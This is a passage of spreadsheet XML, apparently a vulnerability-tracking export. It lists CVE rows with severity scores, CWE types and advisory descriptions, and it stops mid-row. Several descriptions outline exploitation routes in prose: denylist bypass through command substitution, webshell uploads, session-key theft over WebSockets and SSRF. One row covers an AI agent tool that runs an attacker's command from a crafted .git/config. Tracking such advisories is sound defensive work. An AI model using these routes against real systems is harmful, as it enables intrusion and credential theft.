      <c r="B1413" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-58014</t>
        </is>
      </c>
      <c r="C1413" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1413" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1413" s="5" t="inlineStr"/>
      <c r="F1413" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1413" s="5" t="inlineStr"/>
      <c r="H1413" s="5" t="inlineStr">
        <is>
          <t>gnome:glib, redhat:enterprise_linux</t>
        </is>
      </c>
      <c r="I1413" s="5" t="inlineStr">
        <is>
          <t>2026-06-30</t>
        </is>
      </c>
      <c r="J1413" s="5" t="inlineStr"/>
      <c r="K1413" s="5" t="inlineStr">
        <is>
          <t>CWE-193</t>
        </is>
      </c>
      <c r="L1413" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in GLib. An off-by-one error can occur in the g_key_file_get_locale_string_list function in the gkeyfile.c file when loading a key file with an empty value. This flaw can cause an out-of-bounds access of 1 byte or a denial of service when the out-of-bounds access crosses a page boundary.</t>
        </is>
      </c>
      <c r="M1413" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-58014</t>
        </is>
      </c>
    </row>
    <row r="1414">
      <c r="A1414" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1414" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61517</t>
        </is>
      </c>
      <c r="C1414" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1414" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1414" s="5" t="inlineStr"/>
      <c r="F1414" s="5" t="n">
        <v>0.016</v>
      </c>
      <c r="G1414" s="5" t="inlineStr"/>
      <c r="H1414" s="5" t="inlineStr"/>
      <c r="I1414" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1414" s="5" t="inlineStr"/>
      <c r="K1414" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L1414" s="5" t="inlineStr">
        <is>
          <t>Netis NX10 firmware V4.0.1.5808 and V3.0.0.4142 contain an OS command injection vulnerability in the ping diagnostic handler that allows authenticated administrators to execute arbitrary shell commands as root by injecting into the IpAddr parameter. The parameter is interpolated directly into a shell command executed through system() with an incomplete denylist that only blocks spaces, pipes, semicolons, and ampersands, leaving command substitution and alternate field separator expansion available for exploitation.</t>
        </is>
      </c>
      <c r="M1414" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61517</t>
        </is>
      </c>
    </row>
    <row r="1415">
      <c r="A1415" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1415" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61523</t>
        </is>
      </c>
      <c r="C1415" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1415" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1415" s="5" t="inlineStr"/>
      <c r="F1415" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G1415" s="5" t="inlineStr"/>
      <c r="H1415" s="5" t="inlineStr"/>
      <c r="I1415" s="5" t="inlineStr">
        <is>
          <t>2026-08-03</t>
        </is>
      </c>
      <c r="J1415" s="5" t="inlineStr"/>
      <c r="K1415" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L1415" s="5" t="inlineStr">
        <is>
          <t>WebsiteBaker CMS before 2.13.10 contains a code injection vulnerability in the Droplets editor that allows authenticated administrators to inject arbitrary PHP code by submitting malicious content through the droplet Code field, which is written verbatim to a publicly accessible PHP file with no content sanitization. Attackers can save a PHP webshell via the save_droplet handler to a predictable path inside the modules directory, enabling unauthenticated users to achieve remote code execution by making direct HTTP requests to the written file.</t>
        </is>
      </c>
      <c r="M1415" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61523</t>
        </is>
      </c>
    </row>
    <row r="1416">
      <c r="A1416" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1416" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61524</t>
        </is>
      </c>
      <c r="C1416" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1416" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1416" s="5" t="inlineStr"/>
      <c r="F1416" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G1416" s="5" t="inlineStr"/>
      <c r="H1416" s="5" t="inlineStr"/>
      <c r="I1416" s="5" t="inlineStr">
        <is>
          <t>2026-08-03</t>
        </is>
      </c>
      <c r="J1416" s="5" t="inlineStr"/>
      <c r="K1416" s="5" t="inlineStr">
        <is>
          <t>CWE-434</t>
        </is>
      </c>
      <c r="L1416" s="5" t="inlineStr">
        <is>
          <t>WebsiteBaker CMS before 2.13.10 contains an unrestricted file upload vulnerability in the module installation feature that allows authenticated administrators to achieve remote code execution by uploading a crafted ZIP archive containing a PHP webshell alongside a valid info.php metadata file. Attackers can place the malicious archive through the module installation interface, causing the application to extract the webshell into a web-accessible modules/ subdirectory where it becomes immediately executable by any unauthenticated user via direct HTTP request.</t>
        </is>
      </c>
      <c r="M1416" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61524</t>
        </is>
      </c>
    </row>
    <row r="1417">
      <c r="A1417" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1417" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63219</t>
        </is>
      </c>
      <c r="C1417" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1417" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1417" s="5" t="inlineStr"/>
      <c r="F1417" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1417" s="5" t="inlineStr"/>
      <c r="H1417" s="5" t="inlineStr"/>
      <c r="I1417" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J1417" s="5" t="inlineStr"/>
      <c r="K1417" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L1417" s="5" t="inlineStr">
        <is>
          <t>GeoNetwork is a catalog application to manage spatially referenced resources. Prior to versions 4.4.12 and 4.2.17, the API endpoint for creating a new formatter via file upload is unprotected and allows the upload of external uncontrolled files. An unauthenticated attacker can upload arbitrary `.xsl` or `.zip` formatter files to the server.  An unauthenticated attacker can write arbitrary files into the GeoNetwork formatter directory. On its own this constitutes unauthorized write access to server storage. The issue is patched in GeoNetwork versions 4.4.12 and 4.2.17.</t>
        </is>
      </c>
      <c r="M1417" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63219</t>
        </is>
      </c>
    </row>
    <row r="1418">
      <c r="A1418" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1418" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63637</t>
        </is>
      </c>
      <c r="C1418" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1418" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1418" s="5" t="inlineStr"/>
      <c r="F1418" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1418" s="5" t="inlineStr"/>
      <c r="H1418" s="5" t="inlineStr"/>
      <c r="I1418" s="5" t="inlineStr">
        <is>
          <t>2026-08-06</t>
        </is>
      </c>
      <c r="J1418" s="5" t="inlineStr"/>
      <c r="K1418" s="5" t="inlineStr">
        <is>
          <t>CWE-943</t>
        </is>
      </c>
      <c r="L1418" s="5" t="inlineStr">
        <is>
          <t>Dgraph is an open source distributed GraphQL database. Prior to 25.3.8, maybeQuoteArg in graphql/resolve/query_rewriter.go passes regexp filter strings into generated DQL without quoting or validating the /pattern/flags form, allowing crafted GraphQL query or mutation filters to inject DQL operators, disclose unintended nodes, or expand modification and deletion targets. This issue is fixed in version 25.3.8.</t>
        </is>
      </c>
      <c r="M1418" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63637</t>
        </is>
      </c>
    </row>
    <row r="1419">
      <c r="A1419" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1419" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-64199</t>
        </is>
      </c>
      <c r="C1419" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1419" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1419" s="5" t="inlineStr"/>
      <c r="F1419" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1419" s="5" t="inlineStr"/>
      <c r="H1419" s="5" t="inlineStr"/>
      <c r="I1419" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J1419" s="5" t="inlineStr"/>
      <c r="K1419" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L1419" s="5" t="inlineStr">
        <is>
          <t>There is an out-of-bounds read vulnerability in DASYLab due to improper validation of user-supplied data.   This results in a read outside the bounds of an allocated data structure.  Successful exploitation requires an attacker to get a user to open a specially crafted .DSB file.  This issue affects all versions before 2026.0.0.</t>
        </is>
      </c>
      <c r="M1419" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-64199</t>
        </is>
      </c>
    </row>
    <row r="1420">
      <c r="A1420" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1420" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66420</t>
        </is>
      </c>
      <c r="C1420" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1420" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1420" s="5" t="inlineStr"/>
      <c r="F1420" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1420" s="5" t="inlineStr"/>
      <c r="H1420" s="5" t="inlineStr"/>
      <c r="I1420" s="5" t="inlineStr">
        <is>
          <t>2026-07-30</t>
        </is>
      </c>
      <c r="J1420" s="5" t="inlineStr"/>
      <c r="K1420" s="5" t="inlineStr">
        <is>
          <t>CWE-346</t>
        </is>
      </c>
      <c r="L1420" s="5" t="inlineStr">
        <is>
          <t>MeshCentral 1.1.21 contains a cross-site WebSocket hijacking protection bypass vulnerability that allows unauthenticated remote attackers to hijack authenticated administrator sessions by exploiting an unconditional early return in the CheckWebServerOriginName() function within webserver.js when self-signed certificates are in use. Attackers can open cross-origin WebSocket connections to any of the twelve WebSocket endpoints, send crafted action commands to exfiltrate the server sessionKey used to sign session cookies, forge session tokens as arbitrary users, and gain full remote control of all managed devices governed by the MeshCentral instance.</t>
        </is>
      </c>
      <c r="M1420" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66420</t>
        </is>
      </c>
    </row>
    <row r="1421">
      <c r="A1421" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1421" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67328</t>
        </is>
      </c>
      <c r="C1421" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1421" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1421" s="5" t="inlineStr"/>
      <c r="F1421" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1421" s="5" t="inlineStr"/>
      <c r="H1421" s="5" t="inlineStr"/>
      <c r="I1421" s="5" t="inlineStr">
        <is>
          <t>2026-08-01</t>
        </is>
      </c>
      <c r="J1421" s="5" t="inlineStr"/>
      <c r="K1421" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L1421" s="5" t="inlineStr">
        <is>
          <t>@better-auth/sso versions before 1.6.21 contain multiple authentication bypass vulnerabilities in SSO provider handling that allow attackers to sign in as arbitrary users. Attackers can exploit domain verification parsing mismatches, orphaned provider accounts, unbound SAML assertions, or reflected XSS on logout endpoints to gain unauthorized session access and account takeover.</t>
        </is>
      </c>
      <c r="M1421" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67328</t>
        </is>
      </c>
    </row>
    <row r="1422">
      <c r="A1422" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1422" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67340</t>
        </is>
      </c>
      <c r="C1422" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1422" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1422" s="5" t="inlineStr"/>
      <c r="F1422" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G1422" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1422" s="5" t="inlineStr"/>
      <c r="I1422" s="5" t="inlineStr">
        <is>
          <t>2026-08-01</t>
        </is>
      </c>
      <c r="J1422" s="5" t="inlineStr"/>
      <c r="K1422" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L1422" s="5" t="inlineStr">
        <is>
          <t>ArcadeDB before 26.7.2 (arcadedb-engine) allows trigger scripts to look up host classes in java.lang.* (via Java.type) because ScriptTriggerExecutor adds java.lang.* to the allowed packages. An authenticated user with UPDATE_SCHEMA permission can create a JavaScript trigger that invokes java.lang.Runtime.getRuntime().exec() (or ProcessBuilder), achieving OS command execution when the trigger fires.</t>
        </is>
      </c>
      <c r="M1422" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67340</t>
        </is>
      </c>
    </row>
    <row r="1423">
      <c r="A1423" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1423" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67608</t>
        </is>
      </c>
      <c r="C1423" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1423" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1423" s="5" t="inlineStr"/>
      <c r="F1423" s="5" t="n">
        <v>0.015</v>
      </c>
      <c r="G1423" s="5" t="inlineStr">
        <is>
          <t>apache</t>
        </is>
      </c>
      <c r="H1423" s="5" t="inlineStr"/>
      <c r="I1423" s="5" t="inlineStr">
        <is>
          <t>2026-08-03</t>
        </is>
      </c>
      <c r="J1423" s="5" t="inlineStr"/>
      <c r="K1423" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L1423" s="5" t="inlineStr">
        <is>
          <t>Telenia Software TVox 26.5.3 and prior 26.x versions, and 24.9.21 and prior 24.x versions, contain an OS command injection vulnerability in action_audio.php that allows authenticated attackers to execute arbitrary operating system commands by passing an unsanitized pid parameter into an exec() call when the action parameter is set to checkProcess. Attackers can inject malicious OS commands through the pid request parameter to execute arbitrary commands with the privileges of the apache user.</t>
        </is>
      </c>
      <c r="M1423" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67608</t>
        </is>
      </c>
    </row>
    <row r="1424">
      <c r="A1424" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1424" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67610</t>
        </is>
      </c>
      <c r="C1424" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1424" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1424" s="5" t="inlineStr"/>
      <c r="F1424" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1424" s="5" t="inlineStr"/>
      <c r="H1424" s="5" t="inlineStr"/>
      <c r="I1424" s="5" t="inlineStr">
        <is>
          <t>2026-08-03</t>
        </is>
      </c>
      <c r="J1424" s="5" t="inlineStr"/>
      <c r="K1424" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="L1424" s="5" t="inlineStr">
        <is>
          <t>OpenEMR through 8.2.0 contains an improper authentication vulnerability in the OAuth2 dynamic client registration endpoint that allows unauthenticated attackers to register a malicious client with system-level FHIR scopes by supplying a self-generated RSA keypair via the jwks field. Once an administrator approves the registered client, attackers can use the client_credentials grant with a self-signed JWT assertion to obtain access tokens granting read access to all FHIR resources across all patients in the system.</t>
        </is>
      </c>
      <c r="M1424" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67610</t>
        </is>
      </c>
    </row>
    <row r="1425">
      <c r="A1425" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1425" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68581</t>
        </is>
      </c>
      <c r="C1425" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1425" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1425" s="5" t="inlineStr"/>
      <c r="F1425" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1425" s="5" t="inlineStr"/>
      <c r="H1425" s="5" t="inlineStr"/>
      <c r="I1425" s="5" t="inlineStr">
        <is>
          <t>2026-08-02</t>
        </is>
      </c>
      <c r="J1425" s="5" t="inlineStr"/>
      <c r="K1425" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L1425" s="5" t="inlineStr">
        <is>
          <t>Vikunja versions 0.22.0 through 2.3.0 fail to validate the principal type in API token management. Because user IDs and link-share IDs are independent numeric sequences and both resolve through a generic web.Auth.GetID() interface, a link-share JWT whose numeric ID equals a target user's ID is treated as that user by the /api/v1/tokens endpoints. An authenticated attacker can obtain a target's numeric user ID via authenticated user search, then create link shares on an attacker-writable project until the link-share sequence reaches that value, and use the resulting link-share JWT to list, create, and delete the target user's API tokens (including issuing a new token with attacker-chosen scopes under the target's permissions). Fixed in version 2.4.0.</t>
        </is>
      </c>
      <c r="M1425" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68581</t>
        </is>
      </c>
    </row>
    <row r="1426">
      <c r="A1426" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1426" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71309</t>
        </is>
      </c>
      <c r="C1426" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1426" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1426" s="5" t="inlineStr"/>
      <c r="F1426" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1426" s="5" t="inlineStr"/>
      <c r="H1426" s="5" t="inlineStr"/>
      <c r="I1426" s="5" t="inlineStr">
        <is>
          <t>2026-08-05</t>
        </is>
      </c>
      <c r="J1426" s="5" t="inlineStr"/>
      <c r="K1426" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L1426" s="5" t="inlineStr">
        <is>
          <t>rclone is a command-line program to sync files and directories to and from different cloud storage providers. From 1.40.0 until 1.75.0, rclone serve restic does not correctly reject URL paths beginning with ../ in cmd/serve/restic/restic.go WithRemote, which accepts a leading parent path and passes it to GET, HEAD, POST, and DELETE handlers for configured backends including WebDAV, FTP, HTTP, Memory, and SFTP. An attacker who can access the REST endpoint may read, create, overwrite, or delete objects outside the path configured by the operator when the operator publishes a backend subdirectory and the backend credential can access parent or sibling objects. This issue is fixed in 1.75.0.</t>
        </is>
      </c>
      <c r="M1426" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71309</t>
        </is>
      </c>
    </row>
    <row r="1427">
      <c r="A1427" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1427" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71504</t>
        </is>
      </c>
      <c r="C1427" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1427" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1427" s="5" t="inlineStr"/>
      <c r="F1427" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1427" s="5" t="inlineStr"/>
      <c r="H1427" s="5" t="inlineStr"/>
      <c r="I1427" s="5" t="inlineStr">
        <is>
          <t>2026-08-24</t>
        </is>
      </c>
      <c r="J1427" s="5" t="inlineStr"/>
      <c r="K1427" s="5" t="inlineStr">
        <is>
          <t>CWE-862, CWE-915</t>
        </is>
      </c>
      <c r="L1427" s="5" t="inlineStr">
        <is>
          <t>Dolibarr before 24.0.0 contains an improper authorization vulnerability in the Members REST API that allows attackers with only member-creation rights to reset the password of any user account, including the system administrator, without verifying password-change permissions. Attackers can supply an arbitrary user account identifier and new password in the request body to overwrite credentials and immediately lock out the legitimate account holder.</t>
        </is>
      </c>
      <c r="M1427" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71504</t>
        </is>
      </c>
    </row>
    <row r="1428">
      <c r="A1428" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1428" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71963</t>
        </is>
      </c>
      <c r="C1428" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1428" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1428" s="5" t="inlineStr"/>
      <c r="F1428" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G1428" s="5" t="inlineStr"/>
      <c r="H1428" s="5" t="inlineStr"/>
      <c r="I1428" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J1428" s="5" t="inlineStr"/>
      <c r="K1428" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L1428" s="5" t="inlineStr">
        <is>
          <t>Hermes Agent 0.18.2 through 0.21.0, fixed in commit f6234d0, contains a remote code execution vulnerability that allows attackers to execute arbitrary OS commands by supplying a malicious repository with a crafted .git/config that sets core.fsmonitor to an attacker-controlled command. When a user opens the malicious repository and sends any message, the agent triggers a git status index refresh which executes the injected command in the user's process context, exposing the full environment including configured provider API keys.</t>
        </is>
      </c>
      <c r="M1428" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71963</t>
        </is>
      </c>
    </row>
    <row r="1429">
      <c r="A1429" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1429" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72001</t>
        </is>
      </c>
      <c r="C1429" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1429" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1429" s="5" t="inlineStr"/>
      <c r="F1429" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1429" s="5" t="inlineStr"/>
      <c r="H1429" s="5" t="inlineStr"/>
      <c r="I1429" s="5" t="inlineStr">
        <is>
          <t>2026-08-31</t>
        </is>
      </c>
      <c r="J1429" s="5" t="inlineStr"/>
      <c r="K1429" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L1429" s="5" t="inlineStr">
        <is>
          <t>Pangolin before 1.22.0 contains an authentication bypass vulnerability that allows unauthenticated attackers to access any protected resource by supplying an attacker-controlled URL parameter to the share-link authentication endpoint that omits the expected resource identifier from the token verification call. Attackers holding a single valid share link for any resource can authenticate against arbitrary resources across different organizations, bypassing all configured authentication methods including SSO, resource passwords, PIN codes, email allowlists, and header authentication.</t>
        </is>
      </c>
      <c r="M1429" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72001</t>
        </is>
      </c>
    </row>
    <row r="1430">
      <c r="A1430" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1430" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72741</t>
        </is>
      </c>
      <c r="C1430" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1430" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1430" s="5" t="inlineStr"/>
      <c r="F1430" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1430" s="5" t="inlineStr"/>
      <c r="H1430" s="5" t="inlineStr"/>
      <c r="I1430" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J1430" s="5" t="inlineStr"/>
      <c r="K1430" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L1430" s="5" t="inlineStr">
        <is>
          <t>Rainbond through 6.9.7 contains a broken access control vulnerability in the CheckToken function that allows authenticated attackers to access unauthorized enterprise resources by substituting another enterprise's tenant name in URL paths. Attackers can use any valid API token to bypass enterprise ID verification and access or modify another enterprise's services, plugins, environment variables, and certificates.</t>
        </is>
      </c>
      <c r="M1430" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72741</t>
        </is>
      </c>
    </row>
    <row r="1431">
      <c r="A1431" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1431" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73078</t>
        </is>
      </c>
      <c r="C1431" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1431" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1431" s="5" t="inlineStr"/>
      <c r="F1431" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1431" s="5" t="inlineStr"/>
      <c r="H1431" s="5" t="inlineStr"/>
      <c r="I1431" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J1431" s="5" t="inlineStr"/>
      <c r="K1431" s="5" t="inlineStr">
        <is>
          <t>CWE-184, CWE-77</t>
        </is>
      </c>
      <c r="L1431" s="5" t="inlineStr">
        <is>
          <t>Vim is an open source, command line text editor. Prior to 9.2.0840, runtime/plugin/netrwPlugin.vim loads netrw and runtime/pack/dist/opt/netrw/autoload/netrw.vim constructs Bookmarks, History, and Targets menu entries by interpolating attacker-controlled directory paths into executed :menu commands. s:NetrwBookmarkMenu(), s:NetrwTgtMenu(), g:netrw_menu_escape, EX_TRLBAR, and netrw#MakeTgt() fail to neutralize the | command separator or single quotes at five construction sites, allowing a crafted path browsed or bookmarked in GUI Vim to execute arbitrary Ex and operating-system commands. This issue is fixed in version 9.2.0840.</t>
        </is>
      </c>
      <c r="M1431" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73078</t>
        </is>
      </c>
    </row>
    <row r="1432">
      <c r="A1432" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1432" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73247</t>
        </is>
      </c>
      <c r="C1432" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1432" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1432" s="5" t="inlineStr"/>
      <c r="F1432" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1432" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1432" s="5" t="inlineStr"/>
      <c r="I1432" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J1432" s="5" t="inlineStr"/>
      <c r="K1432" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L1432" s="5" t="inlineStr">
        <is>
          <t>Kestra is an open-source, event-driven orchestration platform. Prior to 2.0.0, Kestra's core/src/main/java/io/kestra/core/runners/pebble/functions/HttpFunction.java passes the user-controlled http() uri argument to URI.create() and the server-side HTTP client without restricting private, loopback, or link-local destinations, allowing an unauthenticated attacker to import and execute a flow that accesses internal services or cloud metadata.</t>
        </is>
      </c>
      <c r="M1432" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73247</t>
        </is>
      </c>
    </row>
    <row r="1433">
      <c r="A1433" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1433" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73612</t>
        </is>
      </c>
      <c r="C1433" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="D1433" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1433" s="5" t="inlineStr"/>
      <c r="F1433" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1433" s="5" t="inlineStr"/>
      <c r="H1433" s="5" t="inlineStr"/>
      <c r="I1433" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J1433" s="5" t="inlineStr"/>
      <c r="K1433" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L1433" s="5" t="inlineStr">
        <is>
